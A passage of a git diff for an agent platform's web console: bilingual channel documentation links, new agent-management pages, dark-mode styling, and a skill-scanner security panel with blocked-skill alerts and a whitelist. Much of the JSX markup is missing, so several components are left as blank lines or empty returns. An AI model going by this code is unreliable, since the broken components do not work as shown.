"https://copaw.agentscope.io/docs/channels/#Mattermost", - matrix: "https://copaw.agentscope.io/docs/channels/#Matrix", + "https://copaw.agentscope.io/docs/channels/?lang=en#iMessage-macOS-only", + discord: "https://copaw.agentscope.io/docs/channels/?lang=en#Discord", + qq: "https://copaw.agentscope.io/docs/channels/?lang=en#QQ", + telegram: "https://copaw.agentscope.io/docs/channels/?lang=en#Telegram", + mqtt: "https://copaw.agentscope.io/docs/channels/?lang=en#MQTT", + mattermost: "https://copaw.agentscope.io/docs/channels/?lang=en#Mattermost", + matrix: "https://copaw.agentscope.io/docs/channels/?lang=en#Matrix", + wecom: "https://copaw.agentscope.io/docs/channels/?lang=en#WeCom-WeChat-Work", + xiaoyi: + "https://developer.huawei.com/consumer/cn/doc/service/openclaw-0000002518410344", }; + +// Doc ZH URLs per channel (anchors on https://copaw.agentscope.io/docs/channels) +const CHANNEL_DOC_ZH_URLS: Partial> = { + dingtalk: "https://copaw.agentscope.io/docs/channels/?lang=zh#钉钉推荐", + feishu: "https://copaw.agentscope.io/docs/channels/?lang=zh#飞书", + imessage: + "https://copaw.agentscope.io/docs/channels/?lang=zh#iMessage仅-macOS", + discord: "https://copaw.agentscope.io/docs/channels/?lang=zh#Discord", + qq: "https://copaw.agentscope.io/docs/channels/?lang=zh#QQ", + telegram: "https://copaw.agentscope.io/docs/channels/?lang=zh#Telegram", + mqtt: "https://copaw.agentscope.io/docs/channels/?lang=zh#MQTT", + mattermost: "https://copaw.agentscope.io/docs/channels/?lang=zh#Mattermost", + matrix: "https://copaw.agentscope.io/docs/channels/?lang=zh#Matrix", + wecom: "https://copaw.agentscope.io/docs/channels/?lang=zh#企业微信", + xiaoyi: + "https://developer.huawei.com/consumer/cn/doc/service/openclaw-0000002518410344", +}; + const twilioConsoleUrl = "https://console.twilio.com"; export function ChannelDrawer({ @@ -62,7 +85,8 @@ export function ChannelDrawer({ onClose, onSubmit, }: ChannelDrawerProps) { - const { t } = useTranslation(); + const { t, i18n } = useTranslation(); + const currentLang = i18n.language?.startsWith("zh") ? "zh" : "en"; const label = activeKey ? getChannelLabel(activeKey) : activeLabel; const renderAccessControlFields = () => ( @@ -189,6 +213,60 @@ export function ChannelDrawer({ + + + + + + + + + + + ); + }} + ); case "feishu": @@ -434,6 +512,70 @@ export function ChannelDrawer({ ); + case "wecom": + return ( + <> + + + + + + + + + + + + + + ); + case "xiaoyi": + return ( + <> + + + + + + + + + + + + + + + ); default: return null; } @@ -494,17 +636,32 @@ export function ChannelDrawer({ ? `${label} ${t("channels.settings")}` : t("channels.channelSettings")} - {activeKey && CHANNEL_DOC_URLS[activeKey] && ( - - )} + {activeKey && + CHANNEL_DOC_EN_URLS[activeKey] && + CHANNEL_DOC_ZH_URLS[activeKey] && ( + + )} {activeKey === "voice" && ( + + + +
    + ); +} diff --git a/console/src/pages/Settings/Agents/components/AgentModal.tsx b/console/src/pages/Settings/Agents/components/AgentModal.tsx new file mode 100644 index 000000000..8decbd0f2 --- /dev/null +++ b/console/src/pages/Settings/Agents/components/AgentModal.tsx @@ -0,0 +1,68 @@ +import { Modal, Form, Input } from "antd"; +import { useTranslation } from "react-i18next"; +import type { AgentSummary } from "@/api/types/agents"; + +interface AgentModalProps { + open: boolean; + editingAgent: AgentSummary | null; + form: ReturnType[0]; + onSave: () => Promise; + onCancel: () => void; +} + +export function AgentModal({ + open, + editingAgent, + form, + onSave, + onCancel, +}: AgentModalProps) { + const { t } = useTranslation(); + + return ( + +
    + {editingAgent && ( + + + + )} + + + + + + + + + +
    +
    + ); +} diff --git a/console/src/pages/Settings/Agents/components/AgentTable.tsx b/console/src/pages/Settings/Agents/components/AgentTable.tsx new file mode 100644 index 000000000..ab5677d54 --- /dev/null +++ b/console/src/pages/Settings/Agents/components/AgentTable.tsx @@ -0,0 +1,123 @@ +import { Table, Button, Space, Popconfirm } from "antd"; +import type { ColumnsType } from "antd/es/table"; +import { useTranslation } from "react-i18next"; +import { EditOutlined, DeleteOutlined, RobotOutlined } from "@ant-design/icons"; +import type { AgentSummary } from "../../../../api/types/agents"; +import { useTheme } from "../../../../contexts/ThemeContext"; +import styles from "../index.module.less"; + +interface AgentTableProps { + agents: AgentSummary[]; + loading: boolean; + onEdit: (agent: AgentSummary) => void; + onDelete: (agentId: string) => void; +} + +export function AgentTable({ + agents, + loading, + onEdit, + onDelete, +}: AgentTableProps) { + const { t } = useTranslation(); + const { isDark } = useTheme(); + + // Inline style for disabled buttons — CSS cannot reliably override AntD's disabled styles + const disabledStyle: React.CSSProperties = isDark + ? { color: "rgba(255,255,255,0.35)", opacity: 1 } + : {}; + + const columns: ColumnsType = [ + { + title: t("agent.name"), + dataIndex: "name", + key: "name", + render: (text: string) => ( + + + {text} + + ), + }, + { + title: t("agent.id"), + dataIndex: "id", + key: "id", + }, + { + title: t("agent.description"), + dataIndex: "description", + key: "description", + ellipsis: true, + }, + { + title: t("agent.workspace"), + dataIndex: "workspace_dir", + key: "workspace_dir", + ellipsis: true, + }, + { + title: t("common.actions"), + key: "actions", + width: 200, + render: (_: any, record: AgentSummary) => ( + + + onDelete(record.id)} + disabled={record.id === "default"} + okText={t("common.confirm")} + cancelText={t("common.cancel")} + > + + + + ), + }, + ]; + + return ( +
    + + + ); +} diff --git a/console/src/pages/Settings/Agents/components/PageHeader.tsx b/console/src/pages/Settings/Agents/components/PageHeader.tsx new file mode 100644 index 000000000..e00014733 --- /dev/null +++ b/console/src/pages/Settings/Agents/components/PageHeader.tsx @@ -0,0 +1,27 @@ +import styles from "../index.module.less"; + +interface PageHeaderProps { + title: string; + description?: string; + className?: string; + action?: React.ReactNode; +} + +export function PageHeader({ + title, + description, + className, + action, +}: PageHeaderProps) { + return ( +
    +
    +
    +

    {title}

    +
    + {description &&

    {description}

    } +
    + {action &&
    {action}
    } +
    + ); +} diff --git a/console/src/pages/Settings/Agents/components/index.ts b/console/src/pages/Settings/Agents/components/index.ts new file mode 100644 index 000000000..47e43d99b --- /dev/null +++ b/console/src/pages/Settings/Agents/components/index.ts @@ -0,0 +1,3 @@ +export { PageHeader } from "./PageHeader"; +export { AgentTable } from "./AgentTable"; +export { AgentModal } from "./AgentModal"; diff --git a/console/src/pages/Settings/Agents/index.module.less b/console/src/pages/Settings/Agents/index.module.less new file mode 100644 index 000000000..355d6fba1 --- /dev/null +++ b/console/src/pages/Settings/Agents/index.module.less @@ -0,0 +1,72 @@ +.agentsPage { + padding: 24px; +} + +/* ---- Section (same as Models / Environments) ---- */ + +.section { + margin-bottom: 24px; + display: flex; + justify-content: space-between; + align-items: center; +} + +.section:last-child { + margin-bottom: 0; +} + +.sectionTitle { + margin: 0; + font-size: 24px; + font-weight: 600; +} + +.sectionDesc { + color: #999; + font-size: 14px; +} + +/* ---- Table Card ---- */ + +.tableCard { + margin-bottom: 24px; + + &:last-child { + margin-bottom: 0; + } +} + +/* ─── Dark mode ─────────────────────────────────────────────────────────────── */ +:global(.dark-mode) { + .sectionTitle { + color: rgba(255, 255, 255, 0.85); + } + + .sectionDesc { + color: rgba(255, 255, 255, 0.35); + } +} + +/* Link buttons in table — must be flat global selectors to beat AntD specificity */ +:global(.dark-mode .ant-btn-link) { + color: #8b87f0 !important; + + &:global(:hover) { + color: #a5a2f5 !important; + } +} + +:global(.dark-mode .ant-btn-link.ant-btn-dangerous) { + color: #ff7875 !important; + + &:global(:hover) { + color: #ff9c9a !important; + } +} + +:global(.dark-mode .ant-btn-link:disabled), +:global(.dark-mode .ant-btn-link.ant-btn-disabled), +:global(.dark-mode .ant-btn-link[disabled]) { + color: rgba(255, 255, 255, 0.35) !important; + opacity: 1 !important; +} diff --git a/console/src/pages/Settings/Agents/index.tsx b/console/src/pages/Settings/Agents/index.tsx new file mode 100644 index 000000000..1d29e633d --- /dev/null +++ b/console/src/pages/Settings/Agents/index.tsx @@ -0,0 +1,97 @@ +import { useState } from "react"; +import { Card, Button, Form, message } from "antd"; +import { PlusOutlined } from "@ant-design/icons"; +import { useTranslation } from "react-i18next"; +import { agentsApi } from "../../../api/modules/agents"; +import type { AgentSummary } from "../../../api/types/agents"; +import { useAgents } from "./useAgents"; +import { PageHeader, AgentTable, AgentModal } from "./components"; +import styles from "./index.module.less"; + +export default function AgentsPage() { + const { t } = useTranslation(); + const { agents, loading, deleteAgent } = useAgents(); + const [modalVisible, setModalVisible] = useState(false); + const [editingAgent, setEditingAgent] = useState(null); + const [form] = Form.useForm(); + + const handleCreate = () => { + setEditingAgent(null); + form.resetFields(); + form.setFieldsValue({ + workspace_dir: "", + }); + setModalVisible(true); + }; + + const handleEdit = async (agent: AgentSummary) => { + try { + const config = await agentsApi.getAgent(agent.id); + setEditingAgent(agent); + form.setFieldsValue(config); + setModalVisible(true); + } catch (error) { + console.error("Failed to load agent config:", error); + message.error(t("agent.loadConfigFailed")); + } + }; + + const handleDelete = async (agentId: string) => { + try { + await deleteAgent(agentId); + } catch { + // Error already handled in hook + message.error(t("agent.deleteFailed")); + } + }; + + const handleSubmit = async () => { + try { + const values = await form.validateFields(); + + if (editingAgent) { + await agentsApi.updateAgent(editingAgent.id, values); + message.success(t("agent.updateSuccess")); + } else { + const result = await agentsApi.createAgent(values); + message.success(`${t("agent.createSuccess")} (ID: ${result.id})`); + } + + setModalVisible(false); + } catch (error: any) { + console.error("Failed to save agent:", error); + message.error(error.message || t("agent.saveFailed")); + } + }; + + return ( +
    + } onClick={handleCreate}> + {t("agent.create")} + + } + /> + + + + + + setModalVisible(false)} + /> +
    + ); +} diff --git a/console/src/pages/Settings/Agents/useAgents.ts b/console/src/pages/Settings/Agents/useAgents.ts new file mode 100644 index 000000000..1faebaea5 --- /dev/null +++ b/console/src/pages/Settings/Agents/useAgents.ts @@ -0,0 +1,63 @@ +import { useState, useEffect } from "react"; +import { message } from "antd"; +import { useTranslation } from "react-i18next"; +import { agentsApi } from "@/api/modules/agents"; +import type { AgentSummary } from "@/api/types/agents"; +import { useAgentStore } from "@/stores/agentStore"; + +interface UseAgentsReturn { + agents: AgentSummary[]; + loading: boolean; + error: Error | null; + loadAgents: () => Promise; + deleteAgent: (agentId: string) => Promise; +} + +export function useAgents(): UseAgentsReturn { + const { t } = useTranslation(); + const [agents, setAgents] = useState([]); + const [loading, setLoading] = useState(false); + const [error, setError] = useState(null); + const { setAgents: updateStoreAgents } = useAgentStore(); + + const loadAgents = async () => { + setLoading(true); + setError(null); + try { + const data = await agentsApi.listAgents(); + setAgents(data.agents); + updateStoreAgents(data.agents); + } catch (err) { + console.error("Failed to load agents:", err); + const errorMsg = + err instanceof Error ? err : new Error(t("agent.loadFailed")); + setError(errorMsg); + message.error(t("agent.loadFailed")); + } finally { + setLoading(false); + } + }; + + const deleteAgent = async (agentId: string) => { + try { + await agentsApi.deleteAgent(agentId); + message.success(t("agent.deleteSuccess")); + await loadAgents(); + } catch (err: any) { + message.error(err.message || t("agent.deleteFailed")); + throw err; + } + }; + + useEffect(() => { + loadAgents(); + }, []); + + return { + agents, + loading, + error, + loadAgents, + deleteAgent, + }; +} diff --git a/console/src/pages/Settings/Environments/index.module.less b/console/src/pages/Settings/Environments/index.module.less index 9ea1be333..f588be21e 100644 --- a/console/src/pages/Settings/Environments/index.module.less +++ b/console/src/pages/Settings/Environments/index.module.less @@ -376,3 +376,153 @@ font-size: 32px; opacity: 0.6; } + +/* ─── Dark mode ─────────────────────────────────────────────────────────────── */ +:global(.dark-mode) { + .sectionDesc { + color: rgba(255, 255, 255, 0.35); + } + + .stateText { + color: rgba(255, 255, 255, 0.35); + } + + /* Main card */ + .tableCard { + background: #1f1f1f; + border-color: rgba(255, 255, 255, 0.1); + box-shadow: 0 2px 8px rgba(0, 0, 0, 0.3); + + &:hover { + box-shadow: 0 4px 16px rgba(0, 0, 0, 0.4); + border-color: rgba(255, 255, 255, 0.15); + } + } + + /* Toolbar */ + .toolbar { + background: rgba(255, 255, 255, 0.03); + border-bottom-color: rgba(255, 255, 255, 0.08); + + &:hover { + background: rgba(255, 255, 255, 0.05); + } + } + + .toolbarCount { + color: rgba(255, 255, 255, 0.35); + } + + /* Env row */ + .envRow { + border-bottom-color: rgba(255, 255, 255, 0.06); + + &:hover { + background: rgba(255, 255, 255, 0.04); + } + } + + .envRowSelected { + background: rgba(22, 119, 255, 0.12); + border-left-color: #4096ff; + + &:hover { + background: rgba(22, 119, 255, 0.18); + } + } + + /* Input group (Key / Value 外框) */ + .inputGroup { + border-color: rgba(255, 255, 255, 0.12); + background: #2a2a2a; + + &:focus-within { + border-color: #615ced; + box-shadow: 0 0 0 2px rgba(97, 92, 237, 0.2); + } + } + + /* Key / Value 标签 */ + .inputLabel { + color: rgba(255, 255, 255, 0.4); + border-right-color: rgba(255, 255, 255, 0.08); + background: rgba(255, 255, 255, 0.04); + + .inputGroup:focus-within & { + color: #8b87f0; + background: rgba(97, 92, 237, 0.1); + } + } + + /* Input field inside group */ + .inputField { + color: rgba(255, 255, 255, 0.85); + + &::placeholder { + color: rgba(255, 255, 255, 0.2); + } + + :global(.ant-input), + :global(.copaw-input) { + color: rgba(255, 255, 255, 0.85) !important; + background: transparent !important; + + &::placeholder { + color: rgba(255, 255, 255, 0.2) !important; + } + } + } + + /* Password toggle */ + .passwordToggle { + color: rgba(255, 255, 255, 0.3); + + &:hover { + color: #8b87f0; + background: rgba(97, 92, 237, 0.12); + } + } + + /* Row action icons */ + .rowIconBtn { + color: rgba(255, 255, 255, 0.2); + + &:hover { + color: #8b87f0; + background: rgba(97, 92, 237, 0.12); + } + } + + .rowIconBtnDanger { + &:hover { + color: #ff7875; + background: rgba(255, 77, 79, 0.12); + } + } + + /* Add bar */ + .addBar { + background: rgba(255, 255, 255, 0.02); + border-top-color: rgba(255, 255, 255, 0.08); + + &:hover { + background: rgba(255, 255, 255, 0.04); + } + } + + .addBtn { + border-color: rgba(255, 255, 255, 0.15); + color: rgba(255, 255, 255, 0.35); + + &:hover { + color: #8b87f0; + border-color: #615ced; + background: rgba(97, 92, 237, 0.1); + } + } + + /* Empty state */ + .emptyState { + color: rgba(255, 255, 255, 0.2); + } +} diff --git a/console/src/pages/Settings/Models/index.module.less b/console/src/pages/Settings/Models/index.module.less index 0b6da499a..4bd0e2596 100644 --- a/console/src/pages/Settings/Models/index.module.less +++ b/console/src/pages/Settings/Models/index.module.less @@ -28,7 +28,7 @@ } .sectionDesc { - margin: 0 0 16px; + margin: 0 0 24px; color: #999; font-size: 14px; } @@ -69,7 +69,7 @@ .providerCard { flex: 1 1 calc(33.333% - 16px); - min-width: 280px; + min-width: 432px; border-radius: 16px; transition: all 0.2s ease-in-out; cursor: pointer; @@ -516,3 +516,156 @@ border-radius: 8px; border: 1px dashed #d9d9d9; } + +/* ─── Dark mode ─────────────────────────────────────────────────────────────── */ +:global(.dark-mode) { + .loadingText { + color: rgba(255, 255, 255, 0.35); + } + + .sectionDesc { + color: rgba(255, 255, 255, 0.35); + } + + .providerGroupTitle { + color: rgba(255, 255, 255, 0.4); + } + + /* Provider card */ + .providerCard { + background: #2a2a2a; + + &.normal { + border-color: rgba(255, 255, 255, 0.08) !important; + box-shadow: 0 4px 12px rgba(0, 0, 0, 0.3) !important; + } + + &.hover { + border-color: #615ced !important; + box-shadow: 0 12px 32px rgba(0, 0, 0, 0.4) !important; + } + } + + .cardName { + color: rgba(255, 255, 255, 0.85); + } + + .infoRow { + color: rgba(255, 255, 255, 0.5); + } + + .infoLabel { + color: rgba(255, 255, 255, 0.3); + } + + .infoValue { + color: rgba(255, 255, 255, 0.65); + } + + .infoEmpty { + color: rgba(255, 255, 255, 0.2); + } + + .cardActions { + border-top-color: rgba(255, 255, 255, 0.08); + } + + .configBtn { + color: rgba(255, 255, 255, 0.55); + } + + .statusContainer .statusText.disabled { + color: rgba(255, 255, 255, 0.3); + } + + /* Slot section (LLM 顶部选择区) */ + .slotSection { + background: #2a2a2a; + border-color: rgba(255, 255, 255, 0.08); + box-shadow: 0 2px 8px rgba(0, 0, 0, 0.3); + + &:hover { + box-shadow: 0 4px 16px rgba(0, 0, 0, 0.4); + border-color: rgba(255, 255, 255, 0.15); + } + } + + .slotHeader { + border-bottom-color: rgba(255, 255, 255, 0.08); + } + + .slotTitle { + color: rgba(255, 255, 255, 0.85); + } + + .slotCurrent { + color: #52c41a; + background: rgba(82, 196, 26, 0.1); + border-color: rgba(82, 196, 26, 0.3); + } + + .slotLabel { + color: rgba(255, 255, 255, 0.5); + } + + .slotActions { + border-top-color: rgba(255, 255, 255, 0.08); + } + + /* Advanced config */ + .advancedConfigSection { + border-top-color: rgba(255, 255, 255, 0.08); + } + + .advancedConfigToggle { + color: rgba(255, 255, 255, 0.65); + } + + /* JSON editor */ + .jsonEditorContainer { + border-color: rgba(255, 255, 255, 0.15); + background: #1a1a1a; + + &:focus-within { + border-color: #615ced; + } + } + + .jsonEditorHighlight { + color: rgba(255, 255, 255, 0.45); + } + + .jsonEditorTextarea { + caret-color: rgba(255, 255, 255, 0.85); + } + + /* Model list (modal) */ + .modelList { + border-color: rgba(255, 255, 255, 0.08); + } + + .modelListEmpty { + color: rgba(255, 255, 255, 0.3); + } + + .modelListItem { + border-bottom-color: rgba(255, 255, 255, 0.06); + + &:hover { + background: rgba(255, 255, 255, 0.04); + } + } + + .modelListItemName { + color: rgba(255, 255, 255, 0.85); + } + + .modelListItemId { + color: rgba(255, 255, 255, 0.3); + } + + .modelAddForm { + background: rgba(255, 255, 255, 0.03); + border-color: rgba(255, 255, 255, 0.12); + } +} diff --git a/console/src/pages/Settings/Models/index.tsx b/console/src/pages/Settings/Models/index.tsx index 90b507c0c..8eda32bda 100644 --- a/console/src/pages/Settings/Models/index.tsx +++ b/console/src/pages/Settings/Models/index.tsx @@ -6,7 +6,6 @@ import { PageHeader, LoadingState, ProviderCard, - ModelsSection, CustomProviderModal, } from "./components"; import { useTranslation } from "react-i18next"; @@ -64,18 +63,7 @@ function ModelsPage() { ) : ( <> - {/* ---- LLM Section (top) ---- */} - - - - {/* ---- Providers Section (below) ---- */} + {/* ---- Providers Section ---- */}
    ([]); @@ -9,6 +10,7 @@ export function useProviders() { ); const [loading, setLoading] = useState(true); const [error, setError] = useState(null); + const { selectedAgent } = useAgentStore(); const fetchAll = useCallback(async (showLoading = true) => { if (showLoading) { @@ -41,7 +43,7 @@ export function useProviders() { useEffect(() => { fetchAll(); - }, [fetchAll]); + }, [fetchAll, selectedAgent]); return { providers, diff --git a/console/src/pages/Settings/Security/components/RuleModal.tsx b/console/src/pages/Settings/Security/components/RuleModal.tsx index af64826aa..e6cd46fc8 100644 --- a/console/src/pages/Settings/Security/components/RuleModal.tsx +++ b/console/src/pages/Settings/Security/components/RuleModal.tsx @@ -19,6 +19,7 @@ const BUILTIN_TOOLS = [ "execute_python_code", "browser_use", "desktop_screenshot", + "view_image", "read_file", "write_file", "edit_file", diff --git a/console/src/pages/Settings/Security/components/SkillScannerSection.tsx b/console/src/pages/Settings/Security/components/SkillScannerSection.tsx new file mode 100644 index 000000000..555e0e512 --- /dev/null +++ b/console/src/pages/Settings/Security/components/SkillScannerSection.tsx @@ -0,0 +1,462 @@ +import { useState, useCallback } from "react"; +import { + Card, + InputNumber, + Table, + Tag, + Button, + Modal, + message, + Tooltip, + Empty, + Tabs, +} from "@agentscope-ai/design"; +import { Select, Space } from "antd"; +import { Trash2, ShieldCheck, Eye } from "lucide-react"; +import { useTranslation } from "react-i18next"; +import { useSkillScanner } from "../useSkillScanner"; +import type { + BlockedSkillRecord, + BlockedSkillFinding, + SkillScannerWhitelistEntry, + SkillScannerMode, +} from "../../../../api/modules/security"; +import { skillApi } from "../../../../api/modules/skill"; +import { useTheme } from "../../../../contexts/ThemeContext"; +import styles from "../index.module.less"; + +function FindingsModal({ + findings, + skillName, + open, + onClose, +}: { + findings: BlockedSkillFinding[]; + skillName: string; + open: boolean; + onClose: () => void; +}) { + const { t } = useTranslation(); + + return ( + +
    String(idx)} + pagination={false} + size="small" + columns={[ + { + title: "Title", + dataIndex: "title", + key: "title", + width: 200, + }, + { + title: "File", + key: "location", + width: 160, + render: (_: unknown, record: BlockedSkillFinding) => + record.line_number + ? `${record.file_path}:${record.line_number}` + : record.file_path, + }, + { + title: "Description", + dataIndex: "description", + key: "description", + ellipsis: true, + }, + ]} + /> + + ); +} + +export function SkillScannerSection() { + const { t } = useTranslation(); + const { isDark } = useTheme(); + const darkBtnStyle = isDark ? { color: "rgba(255,255,255,0.75)" } : undefined; + const { + config, + blockedHistory, + whitelist, + loading, + updateConfig, + addToWhitelist, + removeFromWhitelist, + removeBlockedEntry, + clearBlockedHistory, + } = useSkillScanner(); + + const [saving, setSaving] = useState(false); + const [findingsModal, setFindingsModal] = useState<{ + open: boolean; + findings: BlockedSkillFinding[]; + skillName: string; + }>({ open: false, findings: [], skillName: "" }); + + const handleModeChange = useCallback( + async (mode: SkillScannerMode) => { + setSaving(true); + const ok = await updateConfig({ mode }); + if (ok) message.success(t("security.skillScanner.saveSuccess")); + else message.error(t("security.skillScanner.saveFailed")); + setSaving(false); + }, + [updateConfig, t], + ); + + const [pendingTimeout, setPendingTimeout] = useState(null); + + const handleTimeoutBlur = useCallback(async () => { + const value = pendingTimeout; + if (value === null || value < 5 || value > 300) { + setPendingTimeout(null); + return; + } + setSaving(true); + const ok = await updateConfig({ timeout: value }); + if (ok) message.success(t("security.skillScanner.saveSuccess")); + else message.error(t("security.skillScanner.saveFailed")); + setPendingTimeout(null); + setSaving(false); + }, [pendingTimeout, updateConfig, t]); + + const handleAllowSkill = useCallback( + async (record: BlockedSkillRecord, index: number) => { + const ok = await addToWhitelist(record.skill_name, record.content_hash); + if (ok) { + message.success(t("security.skillScanner.whitelist.addSuccess")); + await removeBlockedEntry(index); + } else { + message.error(t("security.skillScanner.whitelist.addFailed")); + } + }, + [addToWhitelist, removeBlockedEntry, t], + ); + + const handleRemoveWhitelist = useCallback( + async (skillName: string) => { + Modal.confirm({ + title: t("security.skillScanner.whitelist.removeConfirm"), + content: t("security.skillScanner.whitelist.removeWillDisable"), + onOk: async () => { + const ok = await removeFromWhitelist(skillName); + if (!ok) { + message.error(t("security.skillScanner.whitelist.removeFailed")); + return; + } + try { + await skillApi.disableSkill(skillName); + message.success( + t("security.skillScanner.whitelist.removeAndDisabled"), + ); + } catch { + message.success(t("security.skillScanner.whitelist.removeSuccess")); + } + }, + }); + }, + [removeFromWhitelist, t], + ); + + const handleClearHistory = useCallback(() => { + Modal.confirm({ + title: t("security.skillScanner.scanAlerts.clearConfirm"), + onOk: async () => { + await clearBlockedHistory(); + }, + }); + }, [clearBlockedHistory, t]); + + if (loading || !config) return null; + + const enabled = config.mode !== "off"; + + const blockedColumns = [ + { + title: t("security.skillScanner.scanAlerts.skillName"), + dataIndex: "skill_name", + key: "skill_name", + width: 180, + }, + { + title: t("security.skillScanner.scanAlerts.action"), + dataIndex: "action", + key: "action", + width: 100, + render: (action: string) => ( + + {action === "blocked" + ? t("security.skillScanner.scanAlerts.actionBlocked") + : t("security.skillScanner.scanAlerts.actionWarned")} + + ), + }, + { + title: t("security.skillScanner.scanAlerts.time"), + dataIndex: "blocked_at", + key: "blocked_at", + width: 180, + render: (val: string) => { + try { + return new Date(val).toLocaleString(); + } catch { + return val; + } + }, + }, + { + title: t("security.skillScanner.scanAlerts.actions"), + key: "actions", + width: 200, + render: (_: unknown, record: BlockedSkillRecord, index: number) => ( + + + + + + + + + + + + ), + }, + ]; + + const whitelistColumns = [ + { + title: t("security.skillScanner.whitelist.skillName"), + dataIndex: "skill_name", + key: "skill_name", + width: 200, + }, + { + title: t("security.skillScanner.whitelist.contentHash"), + dataIndex: "content_hash", + key: "content_hash", + width: 200, + ellipsis: true, + render: (hash: string) => + hash ? ( + + {hash.substring(0, 16)}... + + ) : ( + any + ), + }, + { + title: t("security.skillScanner.whitelist.addedAt"), + dataIndex: "added_at", + key: "added_at", + width: 180, + render: (val: string) => { + try { + return new Date(val).toLocaleString(); + } catch { + return val; + } + }, + }, + { + title: t("security.skillScanner.whitelist.actions"), + key: "actions", + width: 100, + render: (_: unknown, record: SkillScannerWhitelistEntry) => ( + + + + ), + }, + ]; + + return ( + <> + +
    +
    + + + {t("security.skillScanner.mode")} + + +
    String(idx)} + pagination={false} + size="small" + /> + )} + + + ), + }, + { + key: "whitelist", + label: ( + + {t("security.skillScanner.whitelist.title")} + {whitelist.length > 0 && ( + {whitelist.length} + )} + + ), + children: ( +
    + + {whitelist.length === 0 ? ( +
    + + {t("security.skillScanner.whitelist.empty")} + + } + /> +
    + ) : ( +
    + )} + + + ), + }, + ]} + /> + + + setFindingsModal({ open: false, findings: [], skillName: "" }) + } + /> + + ); +} diff --git a/console/src/pages/Settings/Security/components/index.ts b/console/src/pages/Settings/Security/components/index.ts index ee4af737f..3262bffc0 100644 --- a/console/src/pages/Settings/Security/components/index.ts +++ b/console/src/pages/Settings/Security/components/index.ts @@ -2,3 +2,4 @@ export * from "./PageHeader"; export * from "./RuleTable"; export * from "./RuleModal"; export * from "./PreviewModal"; +export * from "./SkillScannerSection"; diff --git a/console/src/pages/Settings/Security/index.module.less b/console/src/pages/Settings/Security/index.module.less index 6f4b09eb0..282dc28d2 100644 --- a/console/src/pages/Settings/Security/index.module.less +++ b/console/src/pages/Settings/Security/index.module.less @@ -7,13 +7,13 @@ /* ---- Header Section ---- */ .header { - margin-bottom: 24px; + margin-bottom: 20px; } .title { - font-size: 24px; - font-weight: 600; - margin: 0 0 8px 0; + font-size: 22px; + font-weight: 700; + margin: 0 0 6px 0; color: #1a1a1a; } @@ -28,12 +28,159 @@ width: 100%; } +/* ---- Main Tabs (Tool Guard / Skill Scanner) ---- */ +.mainTabs { + :global(.copaw-tabs-nav) { + margin-bottom: 20px; + + &::before { + border-bottom: 1px solid #f0f0f0; + } + } + + :global(.copaw-tabs-tab) { + padding: 10px 4px; + font-size: 14px; + font-weight: 500; + color: #666 !important; + + &:hover { + color: #615ced !important; + } + } + + :global(.copaw-tabs-tab-active .copaw-tabs-tab-btn) { + color: #615ced !important; + font-weight: 600; + } + + :global(.copaw-tabs-ink-bar) { + background: #615ced !important; + height: 3px; + border-radius: 2px 2px 0 0; + } +} + +:global(.dark-mode) { + .mainTabs { + :global(.copaw-tabs-tab .copaw-tabs-tab-btn) { + color: #ffffff !important; + } + + :global(.copaw-tabs-tab-active .copaw-tabs-tab-btn) { + color: #8b87f5 !important; + font-weight: 600; + } + + :global(.copaw-tabs-ink-bar) { + background: #8b87f5 !important; + } + } + + .innerTabs { + :global(.copaw-tabs-tab .copaw-tabs-tab-btn) { + color: #ffffff !important; + } + + :global(.copaw-tabs-tab-active .copaw-tabs-tab-btn) { + color: #8b87f5 !important; + } + + :global(.copaw-tabs-ink-bar) { + background: #8b87f5 !important; + } + } + + .tabDescription { + color: rgba(255, 255, 255, 0.45); + } + + .footerButtons { + border-top-color: rgba(255, 255, 255, 0.1); + } +} + +.tabLabel { + display: inline-flex; + align-items: center; + gap: 6px; + font-size: 14px; +} + +.tabContent { + padding-top: 4px; +} + +.tabDescription { + font-size: 14px; + color: #888; + margin: 0 0 20px 0; + line-height: 1.6; +} + +/* ---- Inner Tabs (Scan Alerts / Whitelist) ---- */ +.innerTabs { + margin-top: 20px; + + :global(.copaw-tabs-nav) { + margin-bottom: 16px; + + &::before { + border-bottom: 1px solid #f0f0f0; + } + } + + :global(.copaw-tabs-tab) { + font-size: 13px; + font-weight: 500; + color: #666 !important; + + &:hover { + color: #615ced !important; + } + } + + :global(.copaw-tabs-tab-active .copaw-tabs-tab-btn) { + color: #615ced !important; + } + + :global(.copaw-tabs-ink-bar) { + background: #615ced !important; + } +} + +.tabBadge { + display: inline-flex; + align-items: center; + justify-content: center; + background: #ff4d4f; + color: #fff; + font-size: 11px; + font-weight: 600; + min-width: 18px; + height: 18px; + border-radius: 9px; + padding: 0 5px; + margin-left: 6px; + line-height: 18px; +} + +.tabPanelContent { + padding-top: 4px; +} + +.tabPanelHeader { + display: flex; + justify-content: flex-end; + margin-bottom: 12px; +} + /* ---- Cards ---- */ .formCard { - margin-bottom: 32px; - border-radius: 16px; + margin-bottom: 20px; + border-radius: 12px; border: 1px solid #e8e8e8; - box-shadow: 0 2px 8px rgba(0, 0, 0, 0.04); + box-shadow: 0 1px 4px rgba(0, 0, 0, 0.04); transition: all 0.2s ease-in-out; &:hover { @@ -42,7 +189,7 @@ } :global(.ant-card-body) { - padding: 24px; + padding: 20px 24px; } } @@ -72,7 +219,7 @@ } .sectionTitle { - font-size: 18px; + font-size: 16px; font-weight: 600; margin: 0; color: #1a1a1a; @@ -80,10 +227,10 @@ /* ---- Table Card ---- */ .tableCard { - margin-bottom: 24px; - border-radius: 16px; + margin-bottom: 0; + border-radius: 12px; border: 1px solid #e8e8e8; - box-shadow: 0 2px 8px rgba(0, 0, 0, 0.04); + box-shadow: 0 1px 4px rgba(0, 0, 0, 0.04); transition: all 0.2s ease-in-out; &:hover { @@ -96,7 +243,7 @@ } :global(.ant-table) { - border-radius: 16px; + border-radius: 12px; } :global(.ant-table-thead > tr > th) { @@ -110,7 +257,50 @@ } } -/* ---- Footer Buttons ---- */ +/* ---- Skill Scanner Config ---- */ +.skillScannerConfig { + display: grid; + grid-template-columns: repeat(auto-fit, minmax(280px, 1fr)); + gap: 0; +} + +.skillScannerConfigItem { + display: flex; + align-items: center; + justify-content: space-between; + gap: 12px; + padding-right: 24px; +} + +.skillScannerConfigItem + .skillScannerConfigItem { + padding-right: 0; + padding-left: 24px; + border-left: 1px solid var(--ant-color-border, #f0f0f0); +} + +.skillScannerLabel { + font-weight: 500; + flex-shrink: 0; +} + +.emptyState { + padding: 40px 24px; + display: flex; + justify-content: center; +} + +.emptyText { + color: #999; +} + +:global(.dark-mode) .emptyText { + 